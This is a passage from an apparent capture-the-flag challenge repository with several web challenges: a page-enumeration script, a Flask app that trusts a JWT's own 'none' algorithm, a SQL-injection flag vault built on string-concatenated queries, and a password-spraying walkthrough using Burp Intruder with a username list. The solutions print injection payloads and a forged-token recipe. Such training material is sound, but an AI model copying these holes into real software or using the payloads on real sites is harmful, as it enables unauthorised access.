suggesting that this is probably an enumeration challenge; 17 | i.e., we want to find all of the subpages under this page. 18 | If we try an application normally used for this purpose, like DirBuster, we run into an issue. 19 | All of the pages return a randomized HTTP status, which means that these programs can't automatically figure out what is and isn't a valid page. 20 | 21 | The solution is to write our own script to search for the right page. 22 | We'll simply send requests to all of the pages in a wordlist, and see if any of them respond with something that might be the flag. 
23 | Here's what that looks like in Python: 24 | 25 | ```py 26 | from multiprocessing.pool import Pool 27 | from sys import argv 28 | import requests 29 | 30 | # I used /opt/dirbuster/directory-list-2.3-small.txt for the file, 31 | # other parameters are self-explanatory 32 | if len(argv) != 4: 33 | print(f'Usage: {argv[0]} ') 34 | exit(1) 35 | 36 | url = argv[1] 37 | fname = argv[2] 38 | numthreads = int(argv[3]) 39 | 40 | # Prints out the flag if it's in the content of this page 41 | def check_page(name): 42 | name = name.strip() 43 | r = requests.get(f'{url}/{name}') 44 | if 'jctf' in r.text: 45 | print(r.text) 46 | 47 | # Uses a process pool to check all of the pages with names from the file 48 | with open(fname, 'r') as f: 49 | with Pool(processes=numthreads) as pool: 50 | pool.map(check_page, f, 256) 51 | ``` 52 | 53 | This uses a pool of worker processes (`multiprocessing.Pool`, not threads) to run the requests in parallel and speed things up. 54 | This also means it doesn't actually stop after it prints the flag until it goes through the entire wordlist, so you have to Ctrl-C it manually. 55 | 56 | Flag: `jctf{1t5_jUst_4_nUmb3r_ag8h7z8021}` 57 | 58 | ## Credit 59 | * Developed by [ContronThePanda](https://github.com/PAndaContron), part of [RUSEC](https://rusec.github.io/). 
60 | -------------------------------------------------------------------------------- /web/buster/challenge/buster.py: -------------------------------------------------------------------------------- 1 | from flask import Flask 2 | import random 3 | 4 | app = Flask(__name__) 5 | 6 | @app.route('/') 7 | def root_page(): 8 | return 'My website has lots of subpages, see if you can find them all!\n' 9 | 10 | @app.route('/') 11 | def subpage(path): 12 | if path == 'kbgraphics': 13 | return 'jctf{1t5_jUst_4_nUmb3r_ag8h7z8021}\n', 404 14 | return f'Welcome to {path}!\n', random.choice([200, 400, 401, 402, 403, 404, 500]) 15 | -------------------------------------------------------------------------------- /web/cookie-factory/README.md: -------------------------------------------------------------------------------- 1 | # Granny's Cookie Factory 2 | 3 | ## Challenge Text 4 | * Here at Granny's Old-Fashioned Home-Baked Cookie Factory, we pride ourselves on our cookies AND security being the best in the business. 
Start here: https://jerseyctf-cookie-factory.chals.io/ 5 | 6 | ## Hint 7 | * None, this is a hard challenge 8 | 9 | ## Solution 10 | * Recognize that the `user` cookie is a JWT 11 | * Decode it to see that the data has the structure `{"username": ...}` 12 | * On the dashboard page, read the attached CVE to learn that the vulnerability is a user-controlled `alg` parameter: the server chooses how to verify the token from the token's own unverified header and skips signature verification when that header says `none` (pinning the accepted algorithms server-side, without `none`, closes this) 13 | * Realize that the header and data are Base64 encoded 14 | * Set the algorithm to `"none"` and Base64-encode the header section 15 | * Set the username to `"admin"` and Base64-encode the data section 16 | * Leave the signature section blank 17 | * Flag: `jctf{GEEZ_WHAT_A_TOUGH_COOKIE}` 18 | 19 | ## Credit 20 | * Developed by Edward 21 | -------------------------------------------------------------------------------- /web/cookie-factory/challenge/.dockerignore: -------------------------------------------------------------------------------- 1 | .git 2 | .gitignore 3 | 4 | Dockerfile 5 | .dockerignore 6 | 7 | env 8 | .env 9 | 10 | **/__pycache__ 11 | **/*.py[cdo] 12 | -------------------------------------------------------------------------------- /web/cookie-factory/challenge/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.2-slim 2 | 3 | WORKDIR /app 4 | 5 | RUN pip install --no-cache-dir gunicorn 6 | 7 | COPY requirements.txt . 8 | RUN pip install --no-cache-dir -r requirements.txt 9 | 10 | COPY app.py . 
11 | COPY static static 12 | COPY templates templates 13 | 14 | EXPOSE 80 15 | 16 | CMD ["gunicorn", "app:app", "-b", "0.0.0.0:80"] 17 | -------------------------------------------------------------------------------- /web/cookie-factory/challenge/app.py: -------------------------------------------------------------------------------- 1 | from dotenv import load_dotenv 2 | from flask import Flask, abort, flash, g, make_response, redirect, render_template, request, session, url_for 3 | import jwt 4 | import os 5 | import random 6 | import string 7 | 8 | app = Flask(__name__) 9 | 10 | 11 | # Load secret environment variables 12 | load_dotenv() 13 | 14 | flag = os.getenv("FLAG", "jctf{GEEZ_WHAT_A_TOUGH_COOKIE}") 15 | 16 | app.secret_key = os.getenv("FLASK_SECRET_KEY", "".join(random.choice(string.ascii_letters) for _ in range(32))) 17 | secret = os.getenv("SECRET", "".join(random.choice(string.ascii_letters) for _ in range(32))) 18 | 19 | 20 | # JWT helper functions 21 | def encode_user(username): 22 | return jwt.encode({"username": username}, secret, algorithm="HS256") 23 | 24 | 25 | def decode_user(token): 26 | if token is None: 27 | return None 28 | 29 | try: 30 | alg = jwt.get_unverified_header(token)["alg"] 31 | 32 | if alg == "HS256": 33 | decoded = jwt.decode(token, secret, algorithms=["HS256"]) 34 | elif alg == "none": 35 | decoded = jwt.decode(token, algorithms=["none"], options={"verify_signature": False}) 36 | else: 37 | abort(400, "Invalid JWT algorithm") 38 | except Exception: 39 | abort(400, "Error decoding token") 40 | 41 | 42 | if "username" not in decoded: 43 | abort(400, "Username missing in JWT") 44 | 45 | return decoded["username"] 46 | 47 | 48 | # Flask Routes 49 | @app.errorhandler(400) 50 | def handle_error(error): 51 | return render_template("error.html", error=error), 400 52 | 53 | 54 | @app.route("/") 55 | def index(): 56 | token = request.cookies.get("user", None) 57 | return render_template("index.html", user=decode_user(token)) 58 | 59 | 
60 | @app.route("/dashboard") 61 | def dashboard(): 62 | token = request.cookies.get("user", None) 63 | if not token: 64 | flash("You must be logged in to access this page", "danger") 65 | session["next"] = dashboard.__name__ 66 | return redirect(url_for(login.__name__)) 67 | 68 | return render_template("dashboard.html", user=decode_user(token), flag=flag) 69 | 70 | 71 | @app.route("/login", methods=["GET", "POST"]) 72 | def login(): 73 | if "user" in request.cookies: 74 | flash("Already logged in", "danger") 75 | return redirect(url_for(index.__name__)) 76 | 77 | if request.method == "GET": 78 | return render_template("login.html", user=None) 79 | 80 | username = request.form["username"] 81 | 82 | if username == "": 83 | flash("Username cannot be empty", "danger") 84 | return redirect(url_for(login.__name__)) 85 | 86 | if username == "admin": 87 | flash("Sorry, you can't login as admin", "danger") 88 | return redirect(url_for(login.__name__)) 89 | 90 | redirect_url = session.pop("next", index.__name__) 91 | 92 | resp = make_response(redirect(url_for(redirect_url))) 93 | resp.set_cookie("user", encode_user(username)) 94 | 95 | return resp 96 | 97 | 98 | @app.route("/logout") 99 | def logout(): 100 | resp = make_response(redirect(url_for(index.__name__))) 101 | resp.set_cookie("user", "", expires=0) 102 | return resp 103 | -------------------------------------------------------------------------------- /web/cookie-factory/challenge/requirements.txt: -------------------------------------------------------------------------------- 1 | cffi==1.15.0 2 | click==8.0.4 3 | cryptography==36.0.1 4 | Flask==2.0.3 5 | itsdangerous==2.1.0 6 | Jinja2==3.0.3 7 | MarkupSafe==2.1.0 8 | pycparser==2.21 9 | PyJWT==2.3.0 10 | python-dotenv==0.19.2 11 | Werkzeug==2.0.3 12 | -------------------------------------------------------------------------------- /web/cookie-factory/challenge/static/cookie.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/web/cookie-factory/challenge/static/cookie.png -------------------------------------------------------------------------------- /web/cookie-factory/challenge/templates/base.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Granny's Cookies 7 | 8 | 9 | 10 | 17 | 18 | 19 | 20 |
21 | 39 | 40 |
41 | {% with messages = get_flashed_messages(with_categories=true) %} 42 | {% if messages %} 43 | {% for category, message in messages %} 44 | 45 | {% endfor %} 46 | {% endif %} 47 | {% endwith %} 48 | 49 | {% block content %} 50 | {% endblock %} 51 |
52 |
53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /web/cookie-factory/challenge/templates/dashboard.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block content %} 4 | 5 | 6 | 7 | 8 |

9 | Granny's Cookies Sales Statistics 10 |

11 | 12 |
13 |
14 |
15 |
Record Profits!
16 |
17 |

Our profits are steadily climbing!

18 | 35 |
36 |
37 |
38 |
39 |
40 |
Record Sales!
41 |
42 |

So are our sales numbers!

43 | 60 |
61 |
62 |
63 |
64 |
65 |
Customer Satisfaction
66 |
67 |

Our users love Granny's Old-Fashioned Home-Baked Cookies!

68 |

😟 ➕ 🍪 ➡️ 😀

69 |
70 |
71 |
72 |
73 |
74 |
Flag
75 |
76 | {% if user == "admin" %} 77 |

Welcome admin! The flag is {{ flag }}.

78 | {% else %} 79 |

Sorry, but this information is only for the admin's eyes!

80 |

81 | Here at Granny's Old-Fashioned Home-Baked Cookie Factory, 82 | we're proud to say that we take security very seriously. 83 | Therefore, you won't be able to hack us, because we definitely don't have any 84 | critical vulnerabilities 85 | in our code. 86 |

87 | {% endif %} 88 |
89 |
90 |
91 |
92 | 93 | {% endblock %} 94 | -------------------------------------------------------------------------------- /web/cookie-factory/challenge/templates/error.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block content %} 4 | 5 |

Whoops!

6 | 7 |

Sorry, we encountered the following error: {{ error }}.

8 | 9 | {% endblock %} 10 | -------------------------------------------------------------------------------- /web/cookie-factory/challenge/templates/index.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block content %} 4 | 5 |

6 | Welcome to Granny's Old-Fashioned Home-Baked Cookie Factory! 7 |

8 | 9 |

10 | We mix the nostalgia-inducing taste of Granny's cookie recipes with the great things about today's modern world: 11 | low prices, easy convenience, and top-notch security. 12 | Especially that last one. 13 | Trust us! 14 |

15 | 16 |
17 |
Latest News
18 |
19 |
A Global Hit!
20 |

FOR IMMEDIATE RELEASE: In the last quarter, Granny's Cookie Factory reached record profit levels!

21 | See Dashboard 22 |
23 |
24 | 25 | {% endblock %} 26 | -------------------------------------------------------------------------------- /web/cookie-factory/challenge/templates/login.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block content %} 4 | 5 |

Login

6 | 7 |
8 |
9 | 10 | 11 |
12 |
13 | 14 | 15 |
16 | 17 |
18 | 19 | {% endblock %} 20 | -------------------------------------------------------------------------------- /web/flag-vault/README.md: -------------------------------------------------------------------------------- 1 | # Flag Storage Vault 2 | 3 | ## Challenge Text 4 | * I'm very organized. I even keep all of my flags neatly organized in a database! But, these are my flags! You don't have access to them... or do you? Start here: jerseyctf-flag-vault.chals.io 5 | 6 | ## Hint 7 | * What is the most common type of database? 8 | * What is the flag format? How does that help you? 9 | 10 | ## Solution 11 | * Recognize that the vulnerability is SQL Injection: `app.py` builds both the login query and the flag-lookup query by concatenating form fields into the SQL string, which bound parameters (`?` placeholders) would prevent 12 | * On the login page, put `admin` as the username and `' OR 1=1;--` as the password (or similar payload) 13 | * On the flags page, try `' OR 1=1;--` again 14 | * Realize that it doesn't work here: the table is full of fake flags and the page displays only the first row returned 15 | * Use `' OR flag LIKE 'jctf{%` to get the flag with the correct format 16 | * Flag: `jctf{ALMOST_LIKE_A_NEEDLE_IN_A_HAYSTACK}` 17 | 18 | ## Credit 19 | * Developed by Edward 20 | -------------------------------------------------------------------------------- /web/flag-vault/challenge/.dockerignore: -------------------------------------------------------------------------------- 1 | .git 2 | .gitignore 3 | 4 | Dockerfile 5 | .dockerignore 6 | 7 | env 8 | .env 9 | 10 | **/__pycache__ 11 | **/*.py[cdo] 12 | -------------------------------------------------------------------------------- /web/flag-vault/challenge/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.2-slim 2 | 3 | WORKDIR /app 4 | 5 | RUN pip install --no-cache-dir gunicorn 6 | 7 | COPY requirements.txt . 8 | RUN pip install --no-cache-dir -r requirements.txt 9 | 10 | COPY app.py . 
11 | COPY static static 12 | COPY templates templates 13 | 14 | EXPOSE 80 15 | 16 | CMD ["gunicorn", "app:app", "-b", "0.0.0.0:80"] 17 | -------------------------------------------------------------------------------- /web/flag-vault/challenge/app.py: -------------------------------------------------------------------------------- 1 | from apscheduler.schedulers.background import BackgroundScheduler 2 | from dotenv import load_dotenv 3 | from flask import Flask, Markup, flash, g, redirect, render_template, request, session, url_for 4 | from uuid import uuid4 5 | import datetime 6 | import os 7 | import random 8 | import sqlite3 9 | import string 10 | import time 11 | 12 | app = Flask(__name__) 13 | 14 | 15 | # Load secret environment variables 16 | load_dotenv() 17 | 18 | app.secret_key = os.getenv("FLASK_SECRET_KEY", "".join(random.choice(string.ascii_letters) for _ in range(32))) 19 | admin_password = os.getenv("ADMIN_PASSWORD", "".join(random.choice(string.ascii_letters) for _ in range(32))) 20 | 21 | flag = os.getenv("FLAG", "jctf{ALMOST_LIKE_A_NEEDLE_IN_A_HAYSTACK}") 22 | db_name = os.getenv("DATABASE", "temp.db") 23 | 24 | 25 | # Helper function 26 | def get_db(): 27 | db = getattr(g, "_database", None) 28 | if db is None: 29 | db = sqlite3.connect(db_name) 30 | db.row_factory = sqlite3.Row 31 | g._database = db 32 | return db 33 | 34 | 35 | # Setup database tables 36 | def generate_fake_flag(): 37 | prefix = "jctf" 38 | while prefix == "jctf": 39 | prefix = "".join(random.choice(string.ascii_lowercase) for _ in range(4)) 40 | flag = "".join(random.choice(string.ascii_letters + string.digits + "_") for _ in range(random.randint(8, 40))) 41 | return prefix + "{" + flag + "}" 42 | 43 | 44 | def setup_db(): 45 | with app.app_context(): 46 | db = get_db() 47 | 48 | # Setup admin user once 49 | cur = db.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='users'") 50 | if len(cur.fetchall()) == 0: 51 | db.execute("CREATE TABLE users (username TEXT, 
password TEXT)") 52 | db.execute("INSERT INTO users (username, password) VALUES ('admin', ?)", (admin_password,)) 53 | 54 | # Create flags table first time to prevent "no such table" 55 | db.execute("CREATE TABLE IF NOT EXISTS flags (id TEXT, flag TEXT)") 56 | db.commit() 57 | 58 | # Reset flags table each time 59 | num_flags = random.randint(100_000, 1_000_000) - 2 # We add 2 flags manually 60 | flags = [generate_fake_flag() for _ in range(num_flags)] 61 | flags.append(flag) 62 | random.shuffle(flags) 63 | 64 | flags.insert(0, generate_fake_flag()) 65 | flags = [(str(uuid4()), f) for f in flags] 66 | 67 | db.execute("CREATE TABLE flags_new (id TEXT, flag TEXT)") 68 | db.executemany("INSERT INTO flags_new (id, flag) VALUES (?, ?)", flags) 69 | db.execute("DROP TABLE flags") 70 | db.execute("ALTER TABLE flags_new RENAME TO flags") 71 | db.commit() 72 | 73 | 74 | scheduler = BackgroundScheduler() 75 | scheduler.add_job(setup_db, "interval", minutes=5, next_run_time=datetime.datetime.now()) 76 | scheduler.start() 77 | 78 | 79 | # Flask Routes 80 | @app.route("/") 81 | def index(): 82 | username = session.get("user", None) 83 | return render_template("index.html", user=username) 84 | 85 | 86 | @app.route("/login", methods=["GET", "POST"]) 87 | def login(): 88 | if "user" in session: 89 | flash("Already logged in", "dark") 90 | return redirect(url_for(index.__name__)) 91 | 92 | if request.method == "GET": 93 | return render_template("login.html", user=None) 94 | 95 | username = request.form["username"] 96 | password = request.form["password"] 97 | 98 | db = get_db() 99 | cur = db.execute("SELECT * FROM users WHERE username='" + username + "' AND password='" + password + "'") 100 | user = cur.fetchone() 101 | if user is None: 102 | flash("Username and password not found", "danger") 103 | return redirect(url_for(login.__name__)) 104 | 105 | session["user"] = user["username"] 106 | redirect_url = session.pop("next", index.__name__) 107 | return 
redirect(url_for(redirect_url)) 108 | 109 | 110 | @app.route("/logout") 111 | def logout(): 112 | session.pop("user", None) 113 | return redirect(url_for(index.__name__)) 114 | 115 | 116 | @app.route("/flags", methods=["GET", "POST"]) 117 | def flags(): 118 | if "user" not in session or session["user"] != "admin": 119 | flash(Markup("You must be logged in as the admin user to access this page"), "danger") 120 | session["next"] = flags.__name__ 121 | return redirect(url_for(login.__name__)) 122 | 123 | if request.method == "GET": 124 | return render_template("flags.html", user=session["user"]) 125 | 126 | start_time = time.time() 127 | 128 | db = get_db() 129 | cur = db.execute("SELECT * FROM flags WHERE id='" + request.form["id"] + "'") 130 | res = cur.fetchall() 131 | 132 | if len(res) == 0: 133 | flash("No matching flags found", "danger") 134 | return redirect(url_for(flags.__name__)) 135 | 136 | res_id = res[0]["id"] 137 | res_flag = res[0]["flag"] 138 | 139 | if flag == res_flag: 140 | flash( 141 | Markup(""" 142 |

Congratulations! You found the flag!

143 |

The entry with id=%s has flag=%s.

144 | """ % (res_id, res_flag) 145 | ), 146 | "success" 147 | ) 148 | else: 149 | flash( 150 | Markup(""" 151 |

Here's what your search returned:

152 |

The entry with id=%s has flag=%s.

153 |

About %d result%s (%.3f seconds)

154 | """ % ( 155 | res_id, 156 | res_flag, 157 | len(res), 158 | "s" if len(res) > 1 else "", 159 | time.time() - start_time, 160 | ) 161 | ), 162 | "dark" 163 | ) 164 | 165 | return redirect(url_for(flags.__name__)) 166 | -------------------------------------------------------------------------------- /web/flag-vault/challenge/requirements.txt: -------------------------------------------------------------------------------- 1 | APScheduler==3.9.1 2 | click==8.0.4 3 | Flask==2.0.3 4 | itsdangerous==2.1.0 5 | Jinja2==3.0.3 6 | MarkupSafe==2.1.0 7 | python-dotenv==0.19.2 8 | pytz==2021.3 9 | pytz-deprecation-shim==0.1.0.post0 10 | six==1.16.0 11 | tzdata==2021.5 12 | tzlocal==4.1 13 | Werkzeug==2.0.3 14 | -------------------------------------------------------------------------------- /web/flag-vault/challenge/static/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/web/flag-vault/challenge/static/flag.png -------------------------------------------------------------------------------- /web/flag-vault/challenge/templates/base.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Flag Storage Vault 7 | 8 | 9 | 10 | 34 | 35 | 36 | 37 |
38 | 56 | 57 |
58 | {% with messages = get_flashed_messages(with_categories=true) %} 59 | {% if messages %} 60 | {% for category, message in messages %} 61 | 62 | {% endfor %} 63 | {% endif %} 64 | {% endwith %} 65 | 66 | {% block content %} 67 | {% endblock %} 68 |
69 |
70 | 71 | 72 | 73 | -------------------------------------------------------------------------------- /web/flag-vault/challenge/templates/error.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block content %} 4 | 5 |

Whoops!

6 | 7 |

Sorry, we encountered the following error: {{ error }}.

8 | 9 | {% endblock %} 10 | -------------------------------------------------------------------------------- /web/flag-vault/challenge/templates/flags.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block content %} 4 | 5 |

The Vault

6 | 7 |

8 | Welcome back me! 9 | Your flags are still here, just waiting to be queried! 10 |

11 |

12 | If you're somehow not me and you managed to get here, please get out. 13 | This is top-secret flag stuff. 14 | Well, at the very least, it's not like you'll find the true jctf flag in all the fakes! 15 | Hahahahaha. 16 |

17 | 18 |
19 | 20 |
21 |
22 | 23 | 24 |
25 | 26 |
27 | 28 | 29 | {% endblock %} 30 | -------------------------------------------------------------------------------- /web/flag-vault/challenge/templates/index.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block content %} 4 | 5 |

Well, well, well...

6 | 7 |

It seems that you've found the secret stash of flags I've been keeping.

8 | 9 |

10 | If you're reading this message and you're not me, just turn back now. 11 | I'm not going to let you see my collection of flags. 12 | Plus, I have these flags stored in the safest database I could set up. 13 | It's literally 100% unhackable. 14 |

15 | 16 |

17 | If, on the other hand, you are me, then welcome back! 18 | Your—err, I mean my—flags are waiting right 19 | here. 20 |

21 | 22 | {% endblock %} 23 | -------------------------------------------------------------------------------- /web/flag-vault/challenge/templates/login.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block content %} 4 | 5 |

Login

6 | 7 |
8 |
9 | 10 | 11 |
12 |
13 | 14 | 15 |
16 | 17 |
18 | 19 | {% endblock %} 20 | -------------------------------------------------------------------------------- /web/heres-my-password/README.md: -------------------------------------------------------------------------------- 1 | # heres-my-password 2 | 3 | ## Challenge Text 4 | * Here's the deal - we have a list of 500 users (males, females, and pets) and one password. Log in with the proper credentials for the flag. 5 | * The password is `lightswitchon_and_offLOL26` and the website is www.jerseyctf.online. 6 | 7 | ## Hint 8 | * This is not intended to require manual brute force. What are some other types of brute force methods? 9 | 10 | ## Solution 11 | * Utilize BurpSuite (free version works) to conduct a password spraying brute force attack, i.e. try the one known password against every username in the list. Because each account sees only a single attempt, per-account lockout alone does not stop this; it shows up as many failed logins across different accounts from one source. 12 | * Configure web browser to be connected to the Burp proxy by setting the HTTP proxy to 127.0.0.1:8080. 13 | * With Intercept enabled in the Proxy tab, navigate to the site and submit any username with the provided password. The POST request will be tracked, and switch over to the HTTP history in the Proxy tab. 14 | * Right click the POST method for the www.jerseyctf.online host, and click Send to Intruder. 15 | * In Positions, click Clear on the right. Highlight the username that was inputted and click Add on the right. 16 | * In Payloads, click Load and select the provided users.txt file. Click Start attack, and then click the Length filter twice so that it orders from greatest to least. In ~5-10 minutes of running the attack, the correct user `Wolverine` will have a larger length than the rest because it logged in and provided the flag in an alert. Navigate to the site and enter in the proper credentials to see the flag or simply read it in Burp. 17 | * Flag: `jctf{c0NGR@T2_y0U_p@22wORd_SPR@y3D!}` 18 | * Shares website with osint/contributor challenge. 
19 | 20 | ## Credit 21 | * Developed by [Andrew](https://github.com/peppermintpatty5) and [Logan](https://github.com/Git-Logan) 22 | * Additional Resources: https://owasp.org/www-community/attacks/Password_Spraying_Attack and https://www.youtube.com/watch?v=QcQT4acDbnk 23 | -------------------------------------------------------------------------------- /web/heres-my-password/challenge/users.txt: -------------------------------------------------------------------------------- 1 | Kayden 2 | Ignacio 3 | Bruce 4 | Carmelo 5 | Aditya 6 | Izayah 7 | Seamus 8 | Chandler 9 | Tyler 10 | Xavier 11 | Joseph 12 | Roy 13 | Tyson 14 | Yurem 15 | Alfredo 16 | Colton 17 | Rolando 18 | Christopher 19 | Colt 20 | Clarence 21 | Cyrus 22 | Shamar 23 | Aydin 24 | Prince 25 | Kamren 26 | Kane 27 | Curtis 28 | Alvin 29 | Gianni 30 | Trenton 31 | Dean 32 | Esteban 33 | Beckham 34 | Dereon 35 | Marshall 36 | Hector 37 | Desmond 38 | Lewis 39 | Saul 40 | Jameson 41 | Maverick 42 | Rory 43 | Conner 44 | Brock 45 | Ramon 46 | Eliezer 47 | Nickolas 48 | Cody 49 | Antoine 50 | Jaylon 51 | Javon 52 | Caden 53 | Ronin 54 | Kaleb 55 | Logan 56 | Mateo 57 | Paxton 58 | Clayton 59 | Frankie 60 | Aaron 61 | Frederick 62 | Kaiden 63 | Derick 64 | Quinton 65 | John 66 | Fernando 67 | Tristen 68 | Yandel 69 | Grayson 70 | Raiden 71 | Jordyn 72 | Brent 73 | River 74 | Mitchell 75 | Andrew 76 | Darrell 77 | Bernard 78 | Reid 79 | Arjun 80 | Keagan 81 | Tommy 82 | Bryson 83 | Kylan 84 | Samson 85 | Alfonso 86 | Kale 87 | Shawn 88 | Kody 89 | Callum 90 | Damian 91 | Alan 92 | Jamal 93 | Glenn 94 | Jeremiah 95 | Pierce 96 | Emerson 97 | Gustavo 98 | Jerimiah 99 | Jayce 100 | Manuel 101 | Heath 102 | Zion 103 | Edward 104 | Bennett 105 | Vicente 106 | Oscar 107 | Kenneth 108 | Charles 109 | Blaine 110 | Antwan 111 | Abram 112 | Matteo 113 | Scott 114 | Cannon 115 | Braxton 116 | Wolverine 117 | Reese 118 | Mohammed 119 | Cael 120 | Branson 121 | Gunnar 122 | Joe 123 | Harrison 124 | Vincent 125 | DRodgers 
126 | Quinten 127 | Armando 128 | Lena 129 | Maya 130 | Mireya 131 | Veronica 132 | Kaley 133 | Courtney 134 | Alina 135 | Ariella 136 | Kamila 137 | Ainsley 138 | Jane 139 | Imani 140 | Mollie 141 | Skylar 142 | Jaliyah 143 | Lauren 144 | Marlene 145 | Parker 146 | Alexia 147 | Amiyah 148 | Dylan 149 | Alivia 150 | Camryn 151 | Eva 152 | Cristina 153 | Maeve 154 | Rosemary 155 | Kaitlin 156 | Selah 157 | Kimberly 158 | Mariana 159 | Bailee 160 | Aleena 161 | Brenna 162 | Angelica 163 | Kadence 164 | Alena 165 | Amaya 166 | Jillian 167 | Celeste 168 | Marley 169 | Lucille 170 | Fiona 171 | Addisyn 172 | Ruth 173 | Rebekah 174 | Kinley 175 | Yamilet 176 | Kylie 177 | Shea 178 | Jaylen 179 | Jordan 180 | Alejandra 181 | Ansley 182 | Krista 183 | Halle 184 | Karli 185 | Tessa 186 | Morgan 187 | Journey 188 | Meredith 189 | Kenzie 190 | Kyra 191 | Brittany 192 | Lilian 193 | Elsa 194 | Kendall 195 | Katrina 196 | Mckinley 197 | Isabelle 198 | Ashleigh 199 | Amy 200 | Myla 201 | Sidney 202 | Jasmine 203 | Paloma 204 | Arielle 205 | Francesca 206 | Mareli 207 | Annabelle 208 | Kara 209 | Jazlyn 210 | Dayami 211 | Janet 212 | Helen 213 | Asia 214 | Luz 215 | Kaitlynn 216 | Chelsea 217 | Adrianna 218 | Emelia 219 | Mikayla 220 | Raquel 221 | Lilia 222 | Jaidyn 223 | Jaqueline 224 | Amber 225 | Kamryn 226 | Anna 227 | Daphne 228 | Katelynn 229 | Kayley 230 | Noelle 231 | Raven 232 | Shirley 233 | Elaine 234 | Carissa 235 | Lia 236 | Sylvia 237 | Sarahi 238 | Emilee 239 | Abigayle 240 | Tia 241 | Kaelyn 242 | Regan 243 | Emmalee 244 | Charlie 245 | Phoebe 246 | Chloe 247 | Helena 248 | Kayleigh 249 | Nicole 250 | Savanna 251 | Bandit 252 | Chico 253 | Henry 254 | Nala 255 | Chance 256 | Brady 257 | Sherman 258 | Monkey 259 | Jack 260 | Astro 261 | Otis 262 | Sasha 263 | Luke 264 | Lacey 265 | Bruiser 266 | Hank 267 | Macy 268 | Fiona 269 | Ava 270 | Shadow 271 | Oscar 272 | Marley 273 | Holly 274 | Rocco 275 | Bubba 276 | Oliver 277 | Sandy 278 | Luna 279 | Olive 280 | Zoe 
281 | Rudy 282 | Hannah 283 | Dolce 284 | Frankie 285 | Panda 286 | Simba 287 | Cookie 288 | Romeo 289 | Bear 290 | Samson 291 | Jasper 292 | Josie 293 | Benny 294 | Bruce 295 | Emma 296 | Jeter 297 | Delilah 298 | Lady 299 | Gizmo 300 | Dixie 301 | Zoey 302 | Diesel 303 | Maya 304 | Harley 305 | Dexter 306 | Katie 307 | Loki 308 | Leo 309 | Blue 310 | Chase 311 | Cooper 312 | Guinness 313 | Jax 314 | Cash 315 | Ellie 316 | Bud 317 | Gucci 318 | Riley 319 | Izzy 320 | Ginger 321 | Winston 322 | Koda 323 | Coco 324 | Annie 325 | Winnie 326 | Puppy 327 | Maggie 328 | Bonnie 329 | Sam 330 | Mimi 331 | Roxie 332 | Sydney 333 | Yoda 334 | Mercedes 335 | Scout 336 | Champ 337 | Kahlua 338 | Bruno 339 | Sophie 340 | Minnie 341 | Raven 342 | Rusty 343 | Honey 344 | Kona 345 | Chanel 346 | Rex 347 | Maximus 348 | Ollie 349 | Ranger 350 | Rocky 351 | Toby 352 | Callie 353 | Finn 354 | Missy 355 | Cody 356 | Tank 357 | Sammy 358 | Beau 359 | Tucker 360 | Hazel 361 | Benji 362 | Louie 363 | Ruby 364 | Jake 365 | Millie 366 | Gigi 367 | Samantha 368 | Alex 369 | Miley 370 | Shelby 371 | Lily 372 | Bentley 373 | Madison 374 | Zara 375 | Sally 376 | Casey 377 | Brewster 378 | Porter 379 | Cleo 380 | Oakley 381 | Jameson 382 | Buddy 383 | Dakota 384 | Rufus 385 | Ziggy 386 | Mac 387 | Layla 388 | Mocha 389 | Roxy 390 | Milo 391 | Lucy 392 | Cocoa 393 | Brandy 394 | Stella 395 | Missie 396 | Baxter 397 | Lola 398 | Joey 399 | Molly 400 | Lilly 401 | George 402 | Harry 403 | Penelope 404 | Penny 405 | Payton 406 | Prince 407 | Murphy 408 | Teddy 409 | Mickey 410 | Chewy 411 | Hunter 412 | Brutus 413 | Ace 414 | Baby 415 | Willow 416 | Piper 417 | Foster 418 | Zeus 419 | Nina 420 | Copper 421 | Peanut 422 | Bella 423 | Tyson 424 | Sassy 425 | Lucky 426 | Belle 427 | Nikki 428 | Thor 429 | Wrigley 430 | Daisy 431 | Chloe 432 | Abby 433 | Jasmine 434 | Tiger 435 | Apollo 436 | Roscoe 437 | Max 438 | Allie 439 | Boomer 440 | Sugar 441 | Oreo 442 | Jackson 443 | Moose 444 | Gus 445 | 
Polo 446 | Sadie 447 | Angel 448 | Grace 449 | Kobe 450 | Heidi 451 | Abbie 452 | Maddie 453 | Bo 454 | Rosie 455 | Chester 456 | Princess 457 | Lexi 458 | Pepper 459 | Brody 460 | Phoebe 461 | Whiskey 462 | Dodger 463 | Gracie 464 | Sparky 465 | Buster 466 | Foxy 467 | Scooter 468 | Maverick 469 | Athena 470 | Cisco 471 | Mia 472 | Ella 473 | Cricket 474 | Gunner 475 | Bailey 476 | Charlie 477 | Trixie 478 | Shiner 479 | Duke 480 | Lulu 481 | Rocky 482 | Chester 483 | Salem 484 | Houdini 485 | Bandit 486 | Jasmine 487 | Luna 488 | Angel 489 | Precious 490 | Tigger 491 | Max 492 | Twiggy 493 | Mimi 494 | Snickers 495 | Maggie 496 | Peanut 497 | Sox 498 | Sugar 499 | Blackie 500 | Mittens 501 | -------------------------------------------------------------------------------- /web/heres-my-password/forgot_password.php: -------------------------------------------------------------------------------- 1 | [ 6 | "q" => "What was your first job's company name?", 7 | "a" => "Bank Heist Security 101" 8 | ], 